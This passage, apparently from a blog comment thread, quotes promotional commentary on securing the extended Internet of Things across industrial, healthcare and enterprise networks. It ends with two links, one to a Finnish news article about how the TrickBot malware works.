In this landscape, security technologies that can deliver optimized, cross-platform solutions that cover full connectivity between the cyber and physical worlds are preferred by security teams. Given the range and complexity of XIoT, it’s understandable that CISOs want to consolidate their risk governance processes and have a comprehensive view across all aspects and elements of their networks, spanning industrial, healthcare, and enterprise environments. Efficiency and ease of use are also key considerations and we’ve seen a great deal of progress in those areas as organizations have had to move at warp speed to survive and thrive.
For the last two years we’ve operated under the cloud of COVID. But its silver lining has been the acceleration of the XIoT, the value it delivers to organizations, and the people they serve. With proof we can move forward faster, securely, there is no turning back. The opportunities to think and do differently are limitless, and exciting!
https://www.capgemini.com/service/digital-services/digital-engineering-and-manufacturing-services/iot-and-connected-products/internet-of-things-xiot-platform/
Tomi Engdahl says:
https://etn.fi/index.php/13-news/13186-naein-trickbot-toimii